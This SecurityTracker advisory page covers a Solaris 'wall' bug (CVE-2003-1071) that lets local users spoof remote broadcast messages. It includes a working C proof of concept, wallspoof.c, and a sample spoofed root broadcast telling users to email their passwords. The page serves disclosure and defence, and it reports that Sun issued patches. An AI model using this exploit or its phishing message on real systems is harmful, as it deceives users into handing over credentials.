SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   OS (UNIX)  >   wall (/usr/sbin/wall) Vendors:   Sun
'wall' (/usr/sbin/wall) Bug Lets Local Users Spoof Broadcast Messages
SecurityTracker Alert ID:  1005882
SecurityTracker URL:  http://securitytracker.com/id/1005882
CVE Reference:   CVE-2003-1071   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Jan 3 2003
Impact:   Modification of system information
Exploit Included:  Yes  
Version(s): Solaris 2.x, 7, 8, 9
Description:   A vulnerability was reported in the wall application on Sun Solaris and possibly other UNIX operating systems. A local user can send spoofed messages.

It is reported that a local user can broadcast spoofed messages to all users currently logged in on the system.

According to the report, the /usr/sbin/wall application determines if a message is sent by a local user or a remote user by checking to see if the file descriptor pointed to by stderr corresponds to a tty. If it does not, the application determines if the the first 5 bytes of the message are set to "From ", followed ultimately by a character string in the form of 'user@host'. So, a local user can spoof a 'rpc.walld' message by closing stderr before executing /usr/sbin/wall and then sending a bogus "From " header. A local user can exploit this to attempt to convey apparently official messages to users on the system.

A demonstration exploit transcript and code is provided in the Source Message.

Impact:   A local user can send a message to all logged in users on the system that appears to be a remotely generated broadcast message from an arbitrary source.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sun.com (Links to External Site)
Cause:   State error
Underlying OS:  

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Sun Issues Fix) Re: 'wall' (/usr/sbin/wall) Bug Lets Local Users Spoof Broadcast Messages
Sun has issued patches.



 Source Message Contents

Date:  Fri, 3 Jan 2003 11:53:17 -0500 (EST)
Subject:  Solaris 2.x /usr/sbin/wall Advisory



Affected Operating System(s):  Solaris 2.x-9
   Possibly others derived from AT&T source code.

Affected Program:  /usr/sbin/wall

Synopsis:
  Wall is a setgid tty program that broadcasts a message to every user
currently logged into the system.  It can also receive messages from
remote hosts, via RPC (rpc.walld).
  The way that wall differentiates between messages sent by local and
remote users is by checking if the file descriptor pointed to by stderr
corresponds to a tty.  If it doesn't, wall checks if the first 5 bytes of
the message are "From ".  If this is true, the next non-white characters
must be in the form of user@host.  One can simulate an rpc.walld message
by simply closing stderr before executing /usr/sbin/wall and sending a
fake "From " header.
  If this is achieved, it may be possible (by pretending to be an
administrator), to fool users into doing things they wouldn't normally do!

Example:

> ./wallspoof root@localhost
Enter your message below.  End your message with an EOF (Control+D).
We'll be upgrading the system tonight.  Everyone needs to e-mail their
passwords to suprhakr (he's in charge of security).  If you don't do this
you won't have an account in the morning.  Thanks.
<Done>
Broadcast Message from root (rpc.rwalld) on localhost Fri Jan  3
09:39:49...
>From root@localhost:We'll be upgrading the system tonight.  Everyone needs
to e-mail their passwords to suprhakr (he's in charge of security).  If
you don't do this you won't have an account in the morning.  Thanks.
>

This is how easily users can be tricked!

I believe this is a serious vulnerability, one which requires an IMMEDIATE
patch from Sun.  Anyone who runs Solaris is at risk.  You have probably
already been owned.

Proof of concept:

/*
 wallspoof.c - SOLARIS (X86/SPARC) Exploit
 Don't use this in a malicious way! (i.e. to own people)
 */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  char *userhost;
  char mesg[2050];
  FILE *tmp;
  if (argc < 2) {
    fprintf (stderr, "usage: wallspoof user@host\n");
    exit (-1);
  }
  userhost = argv[1];
  if ((tmp = fopen("/tmp/rxax", "w")) == NULL) {
    perror ("open");
    exit (-1);
  }
  printf ("Enter your message below.  End your message with an EOF (Control+D).\n");
  fprintf (tmp, "From %s:", userhost);
  while (fgets(mesg, 2050, stdin) != NULL)
    fprintf (tmp, "%s", mesg);
  fclose (tmp);
  fclose (stderr);
  printf ("<Done>\n");
  system ("/usr/sbin/wall < /tmp/rxax");
  unlink ("/tmp/rxax");
}

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC